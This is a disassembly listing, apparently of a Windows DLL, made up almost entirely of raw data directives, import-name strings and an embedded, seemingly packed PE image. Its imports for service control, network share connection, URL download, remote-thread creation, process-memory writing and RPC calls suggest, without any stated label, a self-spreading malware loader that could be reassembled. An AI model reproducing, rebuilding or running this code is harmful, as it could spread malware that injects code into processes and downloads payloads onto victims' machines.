dd 6C470100h, 6C61626Fh, 65657246h, 6C470100h, 6C61626Fh
dd 6F6C6C41h, 53010063h, 7065656Ch, 6F4C0100h, 69466B63h
dd 100656Ch, 46746547h, 53656C69h, 657A69h, 65724301h
dd 46657461h, 41656C69h, 6F4D0100h, 69466576h, 7845656Ch
dd 43010041h, 4679706Fh, 41656C69h, 6F4D0100h, 69466576h
dd 41656Ch, 74654701h, 74737953h, 69446D65h, 74636572h
dd 4179726Fh, 65470100h, 72655674h, 6E6F6973h, 6C430100h
dd 4865736Fh, 6C646E61h, 43010065h, 74616572h, 72685465h
dd 646165h, 74654701h, 7473614Ch, 6F727245h, 43010072h
dd 74616572h, 74754D65h, 417865h, 74654701h, 706D6F43h
dd 72657475h, 656D614Eh, 47010041h, 6F4D7465h, 656C7564h
dd 656C6946h, 656D614Eh, 44010041h, 62617369h, 6854656Ch
dd 64616572h, 7262694Ch, 43797261h, 736C6C61h, 69560100h
dd 61757472h, 6F72506Ch, 74636574h, 69560100h, 61757472h
dd 6572466Ch, 56010065h, 75747269h, 6C416C61h, 636F6Ch
dd 74654701h, 636F7250h, 72646441h, 737365h, 616F4C01h
dd 62694C64h, 79726172h, 43010041h, 74616572h, 6D655265h
dd 5465746Fh, 61657268h, 57010064h, 65746972h, 636F7250h
dd 4D737365h, 726F6D65h, 47010079h, 6F4D7465h, 656C7564h
dd 646E6148h, 41656Ch, 18100h, 0
db 0
db 1, 43h, 6Ch
aOseservicehand db 'oseServiceHandle',0
db 1, 52h, 65h
aGcreatekeyexw db 'gCreateKeyExW',0
dw 5201h
aEgopenkeyexw db 'egOpenKeyExW',0
db 1, 52h, 65h
aGqueryvalueexw db 'gQueryValueExW',0
db 1
aRegsetvalueexw db 'RegSetValueExW',0
db 1
aOpenscmanagera db 'OpenSCManagerA',0
db 1
aOpenservicea db 'OpenServiceA',0
db 1, 52h, 65h
aGclosekey db 'gCloseKey',0
dw 4301h
aOntrolservice db 'ontrolService',0
dw 5201h
aEgqueryvalueex db 'egQueryValueExA',0
db 1
aRegopenkeyexa db 'RegOpenKeyExA',0
db 1
aRegsetvalueexa db 'RegSetValueExA',0
align 4
db 8Eh ;
db 1, 2 dup(0)
db 28h ; (
db 1, 2 dup(0)
db 1
aWnetaddconnect db 'WNetAddConnection2A',0
db 1, 57h, 4Eh
aEtcancelconnec db 'etCancelConnection2A',0
align 2
dw 196h
db 0
align 2
dw 134h
db 0
align 2
dw 5F01h
aAdjust_fdiv db 'adjust_fdiv',0
db 1
a_initterm db '_initterm',0
db 1
aCalloc db 'calloc',0
db 1
aSscanf db 'sscanf',0
db 1
aStrchr db 'strchr',0
db 1
aRealloc db 'realloc',0
db 1
a_fdopen db '_fdopen',0
db 1, 66h, 70h
aRintf db 'rintf',0
dw 6601h
aTell db 'tell',0
db 1, 73h, 74h
aRcpy db 'rcpy',0
db 1, 5Fh, 73h
aTricmp db 'tricmp',0
db 1
a_errno db '_errno',0
db 1
aFseek db 'fseek',0
dw 6601h
aRead db 'read',0
db 1, 73h, 74h
aRcmp db 'rcmp',0
db 1, 66h, 6Fh
dd 6E6570h, 6C636601h, 65736Fh, 72776601h, 657469h, 6D656D01h
dd 706D63h, 72747301h, 746163h, 6E697301h, 6F6C0100h, 73010067h
dd 6F747274h, 6101006Bh, 696F74h, 74735F01h, 63696E72h
dd 100706Dh, 63736377h, 1007970h, 63736377h, 1007461h
dd 6C69665Fh, 6F6E65h, 73665F01h, 746174h, 61727301h, 100646Eh
dd 73736377h, 1007274h, 6C736377h, 1006E65h, 736D656Dh
dd 1007465h, 636D656Dh, 1007970h, 6C6C616Dh, 100636Fh
dd 7274735Fh, 72776Ch, 72747301h, 727473h, 78655F01h, 74706563h
dd 6E61685Fh, 72656C64h, 5F010033h, 64727473h, 1007075h
dd 65657266h, 735F0100h, 6972706Eh, 66746Eh, 6E617201h
dd 73010064h, 636E7274h, 1007461h, 6E727473h, 797063h
dd 72747301h, 6E656Ch, 73626101h, 6D5F0100h, 63696D65h
dd 706Dh, 1A1h, 2B8h, 556F4301h, 696E696Eh, 6C616974h
dd 657A69h, 436F4301h, 74616572h, 736E4965h, 636E6174h
dd 43010065h, 696E496Fh, 6C616974h, 45657A69h, 0AB000078h
dd 0F4000001h, 0FF000001h, 7FF0002h, 6FF00h, 1B800h, 20400h
dd 644E0100h, 696C4372h, 43746E65h, 326C6C61h, 70520100h
dd 72745363h, 42676E69h, 69646E69h, 6F43676Eh, 736F706Dh
dd 1004165h, 42637052h, 69646E69h, 7246676Eh, 74536D6Fh
dd 676E6972h, 646E6942h, 41676E69h, 70520100h, 6E694263h
dd 676E6964h, 65657246h, 1C30000h, 2C80000h, 4F010000h
dd 69617462h, 6573556Eh, 65674172h, 7453746Eh, 676E6972h
dd 52550100h, 776F444Ch, 616F6C6Eh, 466F5464h, 41656C69h
dd 1CE0000h, 2180000h, 47010000h, 654B7465h, 616F6279h
dd 614C6472h, 74756F79h, 7473694Ch, 1D90000h, 2200000h
dd 56010000h, 75517265h, 56797265h, 65756C61h, 47010041h
dd 69467465h, 6556656Ch, 6F697372h, 666E496Eh, 100416Fh
dd 46746547h, 56656C69h, 69737265h, 6E496E6Fh, 69536F66h
dd 41657Ah, 1E500h, 23000h, 6E490100h, 6E726574h, 704F7465h
dd 416E65h, 74744801h, 65755170h, 6E497972h, 416F66h, 746E4901h
dd 656E7265h, 61655274h, 6C694664h, 49010065h, 7265746Eh
dd 4374656Eh, 65736F6Ch, 646E6148h, 100656Ch, 65746E49h
dd 74656E72h, 43746547h, 656E6E6Fh, 64657463h, 74617453h
dd 49010065h, 7265746Eh, 4F74656Eh, 556E6570h, 416C72h
dd 1F100h, 24C00h, 12FF00h, 0FF0097FFh, 10FF000Ah, 15FF00h
dd 0FF0014FFh, 1FF000Dh, 2FF00h, 0FF0013FFh, 16FF0006h
dd 34FF00h, 0FF0008FFh, 0CFF0003h, 39FF00h, 0FF0073FFh
dd 4FF0009h, 6FFF00h, 0FF0070FFh, 5701000Eh, 6F494153h
dd 6C7463h, 0FF0017FFh, 0Bh, 0F0000000h, 14040350h, 0C040C04h
dd 0C046404h, 114F004h, 54042C04h, 0EC041404h, 464F004h
dd 0F0049C04h, 4041DD8h, 4301404h, 4 dup(4040404h), 4080808h
dd 8080404h, 4040408h, 4080804h, 7 dup(4040404h), 4040804h
dd 4080404h, 4040808h, 4080808h, 8040408h, 4040408h, 8040404h
dd 2 dup(4040404h), 4040C04h, 4 dup(4040404h), 0F0080408h
dd 3C0401E0h, 0C044404h, 0F0041404h, 0C0C0360h, 0C0C0C0Ch
dd 0F00C0C0Ch, 4041EA4h, 4040404h, 0F0040404h, 40402C8h
dd 3B3F004h, 110D271Bh, 19172413h, 1D0C1906h, 270F1414h
dd 21100709h, 5080509h, 2E0C350Bh, 50A4717h, 180E251Fh
dd 81F0605h, 3C221507h, 12F00609h, 33060801h, 25353509h
dd 2D193B2Ch, 71E1308h, 0C172157h, 450A0B73h, 0C25396Ch
dd 3D65135Ah, 7E070C42h, 2D1F1923h, 1D160E36h, 911A1E0Fh
dd 1D2E190Ch, 13090907h, 62B0505h, 9071D13h, 2B142E09h
dd 18122F06h, 3C081708h, 2D101909h, 28837331h, 2C4B1D78h
dd 0D44B22Dh, 390F090Fh, 70A080Dh, 1C070716h, 0C192A06h
dd 16070605h, 5C071218h, 0D150E26h, 9120B20h, 1E0B1D10h
dd 1F271009h, 2A602CCEh, 140C0815h, 712190Eh, 30291406h
dd 6070638h, 142D0731h, 22070D07h, 1F190B12h, 171E2909h
dd 10285B17h, 5D111613h, 93D2329h, 34440B1Dh, 341D1B45h
dd 19211B35h, 44261209h, 235C0A16h, 1B1C1723h, 81E081Bh
dd 7F1F0B12h, 60B1820h, 24072419h, 9760708h, 60C0C14h
dd 8141D0Fh, 0D2C0706h, 14094B16h, 54A31110h, 0E1B0A0Bh
dd 9080708h, 60B9916h, 5090D06h, 110C1409h, 80E0908h, 12090807h
dd 1C060998h, 5094007h, 6071C09h, 7082F06h, 10060A09h
dd 281A2107h, 6716370Eh, 180D1C12h, 190B0A17h, 1D0A1214h
dd 1A131113h, 80C1E1Ah, 0E1A0918h, 11350919h, 22050929h
dd 626083Ah, 1D35200Eh, 57471307h, 0A530D19h, 2D23063Ch
dd 5116E06h, 2F223B09h, 66050F06h, 51D2F06h, 1B0C0B14h
dd 11150906h, 70A0711h, 240B0918h, 7084B0Fh, 5C0A2F15h
dd 8331120h, 11080F26h, 1F8BF038h, 39228B17h, 0C3C0E3Ch
dd 0D070794h, 120E1B15h, 12121812h, 9113213h, 52C3A12h
dd 9B260E13h, 17130D07h, 9110920h, 650B101Dh, 15440F06h
dd 2F060627h, 3A09090Bh, 616210Ch, 140E0B0Dh, 0D0C400Ch
dd 11281611h, 1124320Dh, 0C070817h, 1906070Ch, 7080C06h
dd 120B0D08h, 1B0F1E14h, 513170Ch, 0F19051Dh, 6405102Bh
dd 0E09052Eh, 7142605h, 7063812h, 1E332922h, 0A0F0C15h
dd 1E0C1937h, 0E0C3317h, 181E2B16h, 13140E24h, 2C140E11h
dd 724100Ch, 29110806h, 0C0E0C09h, 1D210908h, 90F080Dh
dd 35340635h, 0A2602818h, 132FBC13h, 0D170905h, 81B4108h
dd 342E4D10h, 31F0730Dh, 2F0A1102h, 0E3F470Eh, 0A30310Dh
dd 6 dup(0A12090Ch), 0A120D0Ch, 0A2A090Ch, 1D21090Ch, 1F05C0F0h
dd 323F00Ch, 0B8F00C1Fh, 0B9F00F02h, 3E44DF01h, 3AAF014h
dd 17013DF0h, 34E4700Eh, 0BDF0502Dh, 45510F01h, 0F00178F0h
dd 0F073013Ch, 0F0530161h, 404013Ah, 6 dup(4040404h), 16540404h
dd 1F01D57h, 0B90B3301h, 142607DCh, 1C07250Bh, 4F018D2h
dd 39BF001h, 8BF01609h, 0A0C0701h, 0F00C18F0h, 0DA3015Eh
dd 0D970E7Ch, 0F004BCF0h, 32050269h, 20361C0Ch, 0A0C1F13h
dd 8820081Eh, 7154D32h, 0F047473Ch, 2149036Ah, 196C115Ah
dd 5A191919h, 36172413h, 7072F09h, 1B0AAA12h, 1E727F09h
dd 1E68602Ch, 8B0B8033h, 0A4192210h, 0E163007h, 2F00D12h
dd 3B222901h, 124D0C05h, 3F1F0C19h, 57237D57h, 287B2C0Ah
dd 2B221111h, 71A2909h, 1517285Eh, 1B640719h, 70A0A07h
dd 7070707h, 220A0A14h, 4619071Ah, 0C0A0913h, 19071A23h
dd 250F114Fh, 272A220Ch, 27272326h, 15071A27h, 0A091358h
dd 2B0C230Ch, 1307192Ch, 601CEF0h, 6E40606h, 6060606h
dd 6080E06h, 0E080D0Bh, 0B050505h, 0C150A0Dh, 5C122206h
dd 606061Ch, 3 dup(6060606h), 13F00506h, 0F004041Bh, 4040348h
dd 5 dup(4040404h), 8080424h, 5 dup(8080808h), 4100410h
dd 45500014h, 14C0000h, 0A4C60003h, 3F73h, 0
dd 0E00000h, 10B210Eh, 34000005h, 38000001h, 0
dd 33F90000h, 10000001h, 50000000h, 1, 10001000h, 2000000h
dd 40000h, 50000h, 40001h, 0
align 10h
dd 4000001h, 0
dd 20000h, 0
dd 10000010h, 0
dd 10000010h, 0
dd 100000h, 2 dup(0)
dd 35480000h, 1040001h, 6 dup(0)
dd 80000000h, 0A300001h, 0Ch dup(0)
dd 10000000h, 2D40000h, 6 dup(0)
dd 742E0000h, 747865h, 32420000h, 10000001h, 34000000h
dd 4000001h, 3 dup(0)
dd 200000h, 642E6000h, 617461h, 28700000h, 50000000h, 6000001h
dd 38000000h, 1, 2 dup(0)
dd 400000h, 722EC000h, 636F6C65h, 0DE40000h, 80000000h
dd 0E000001h, 3E000000h, 1, 2 dup(0)
dd 400000h, 80004200h, 39200001h, 88770001h, 8E000001h
dd 4D00018Dh, 11FB66C5h, 36C8979h, 0E1E02B8Dh, 8E70297Ah
dd 50E86537h, 0F523DFB9h, 0B1FAB870h, 2EA364F0h, 59304DC3h
dd 6D590850h, 10441251h, 0C3D8h, 0C00A80F3h, 0DCBC0303h
dd 0A44D161Ch, 0B0098C8Ch, 3E401F1Ch, 170584D8h, 780E1FCBh
dd 0E41FFFF9h, 90568C06h, 0A27CF47Ch, 86FED37Ch, 83E4137Ch
dd 2E5B077Ch, 0BEB807FFh, 0E84E7C86h, 0A01B7CA1h, 4702F517h
dd 7909B07h, 301CB24h, 0CDF72717h, 88FC81C8h, 8916E26Fh
dd 0D9D8016Fh, 2139F2E4h, 596F0416h, 97215970h, 8040F2Fh
dd 58FCDA43h, 213658FCh, 17BF2FDDh, 5611761h, 484E795Fh
dd 6E2E133h, 0C6697800h, 1379A426h, 426D6C17h, 0B09919Ah
dd 909B7E7Dh, 5B0C6466h, 0C677075Ch, 0FB9A426h, 8DADA2Bh
dd 0B19A2A2Fh, 0E2B6909h, 90717017h, 0D426466h, 0A4264140h
dd 6B109919h
_text ends
end DllEntryPoint